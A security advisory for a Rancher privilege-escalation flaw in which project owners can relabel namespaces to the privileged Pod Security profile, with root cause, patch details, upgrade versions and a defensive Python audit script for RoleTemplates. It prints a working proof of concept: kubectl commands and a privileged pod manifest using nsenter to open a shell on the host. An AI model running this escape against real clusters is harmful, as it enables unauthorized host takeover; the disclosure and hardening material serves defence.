CVE-2026-41052: Rancher Project Owner Privilege Escalation to Host
A Rancher user with Project Owner access can relabel a namespace to use the 'privileged' Pod Security Admission profile, then deploy containers that break out of standard isolation and reach host-leve
The problem
The built-in `project-owner` RoleTemplate granted a wildcard `*` verb on `management.cattle.io/projects`. That wildcard silently included the custom `updatepsa` verb, which Rancher's admission webhook uses to gate Pod Security Admission label changes on namespaces.
A user with only Cluster Member access who also owns a project could therefore call `updatepsa`, flip a namespace to the `privileged` PSA profile, and deploy workloads that disable all container security boundaries. The result is container breakout and full host access on any node that schedules the workload.
Proof of concept
A working proof-of-concept for CVE-2026-41052 in github.com/rancher/rancher, with the exact payload below.
```shell
# Step 1 – relabel the namespace to privileged PSA (requires updatepsa, which project-owner had via *)
kubectl label namespace <your-namespace> \
  pod-security.kubernetes.io/enforce=privileged \
  pod-security.kubernetes.io/enforce-version=latest \
  pod-security.kubernetes.io/warn=privileged \
  pod-security.kubernetes.io/audit=privileged \
  --overwrite

# Step 2 – deploy a privileged pod to escape to the host
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: priv-escape
  namespace: <your-namespace>
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: shell
    image: alpine
    command: ["nsenter", "--mount=/proc/1/ns/mnt", "--", "/bin/sh"]
    securityContext:
      privileged: true
    stdin: true
    tty: true
EOF
```

The root cause is the wildcard `verbs: ["*"]` in the built-in `project-owner` RoleTemplate for the `projects` resource in the `management.cattle.io` API group. Rancher's webhook checks for the `updatepsa` verb before allowing PSA label mutations on namespaces, but because `*` matches every verb, project owners already had that permission implicitly, bypassing the intended access control gate.
The patch (PR #55061, commit 2800aaac) replaced `"*"` with an explicit allowlist: `get`, `update`, `delete`, `patch`, `create`, `list`, `watch`, `deletecollection`. That list intentionally omits `updatepsa`, so the webhook check now correctly denies the label mutation for project owners.
This maps to CWE-305 (Authentication Bypass by Primary Weakness) and the MITRE ATT&CK techniques T1611 (Escape to Host) and T1068 (Exploitation for Privilege Escalation).
The fix
Upgrade to Rancher v2.12.10, v2.13.6, or v2.14.2. If an immediate upgrade is not possible, replace the built-in `project-owner` role with a custom RoleTemplate that sets verbs for `management.cattle.io/projects` to the explicit list `[get, update, delete, patch, create, list, watch, deletecollection]` and omits `*` and `updatepsa`.
Any existing wildcard-based project-owner bindings must be re-created against the restricted role.
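To find templates that still carry the wildcard and to produce the restricted replacement rule, here is an added example (not Rancher's code) that audits RoleTemplate objects in the `management.cattle.io/v3` shape, where `rules` sits at the top level; the sample template is constructed to mirror the vulnerable built-in `project-owner`:

```python
# Added example (not Rancher's code): audit RoleTemplate objects for the
# CVE-2026-41052 pattern and build the allowlisted replacement rule.
# Assumes the management.cattle.io/v3 RoleTemplate shape with top-level `rules`.

PROJECTS_GROUP = "management.cattle.io"
PROJECTS_RESOURCE = "projects"
# Explicit allowlist from the patch; `updatepsa` is deliberately absent.
SAFE_VERBS = ["get", "update", "delete", "patch", "create", "list", "watch", "deletecollection"]

def rule_grants_updatepsa(rule):
    """True if one RBAC rule lets its holder call updatepsa on projects."""
    groups, resources, verbs = (rule.get(k, []) for k in ("apiGroups", "resources", "verbs"))
    hits_group = "*" in groups or PROJECTS_GROUP in groups
    hits_resource = "*" in resources or PROJECTS_RESOURCE in resources
    return hits_group and hits_resource and ("*" in verbs or "updatepsa" in verbs)

def audit_role_template(tmpl):
    """Indexes of rules in a RoleTemplate that grant updatepsa on projects."""
    return [i for i, r in enumerate(tmpl.get("rules", [])) if rule_grants_updatepsa(r)]

def hardened_projects_rule():
    """The replacement rule: projects verbs pinned to the explicit allowlist."""
    return {"apiGroups": [PROJECTS_GROUP], "resources": [PROJECTS_RESOURCE], "verbs": list(SAFE_VERBS)}

def harden_role_template(tmpl):
    """Copy of tmpl with each offending projects-only rule replaced by the allowlist.
    Rules that match via a wildcard group or resource are left alone (narrowing them
    to projects would drop unrelated grants) and stay flagged by audit_role_template."""
    def is_projects_only(r):
        return "*" not in r.get("apiGroups", []) and "*" not in r.get("resources", [])
    fixed = dict(tmpl)
    fixed["rules"] = [hardened_projects_rule() if rule_grants_updatepsa(r) and is_projects_only(r) else r
                      for r in tmpl.get("rules", [])]
    return fixed

# Constructed sample mirroring the vulnerable built-in project-owner template.
VULNERABLE_PROJECT_OWNER = {
    "apiVersion": "management.cattle.io/v3",
    "kind": "RoleTemplate",
    "metadata": {"name": "project-owner"},
    "rules": [
        {"apiGroups": [PROJECTS_GROUP], "resources": [PROJECTS_RESOURCE], "verbs": ["*"]},
        {"apiGroups": [""], "resources": ["namespaces"], "verbs": ["get", "list", "watch"]},
    ],
}

print("offending rule indexes:", audit_role_template(VULNERABLE_PROJECT_OWNER))  # [0]
print("after hardening:", audit_role_template(harden_role_template(VULNERABLE_PROJECT_OWNER)))  # []
```

Feed it the output of `kubectl get roletemplates -o json` (each item as one dict) to check a cluster's templates; a rule that reaches `projects` through a wildcard group or resource is only reported, not rewritten.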
Reported by MMunier and Trolldemorted.
Related research
- high · 8.8 · CVE-2026-41053: Rancher GitHub App Auth Over-Inclusive Team Membership Expansion
- high · 7.1 · CVE-2026-50163: oras-go Hardlink Path Traversal via CWD Resolution
- high · 8.1 · CVE-2026-50138: goshs WebDAV Mode-Flag Access Control Bypass
- high · 7.5 · CVE-2026-50151: oras-go Credential Leak via Unvalidated Location Header in Blob Upload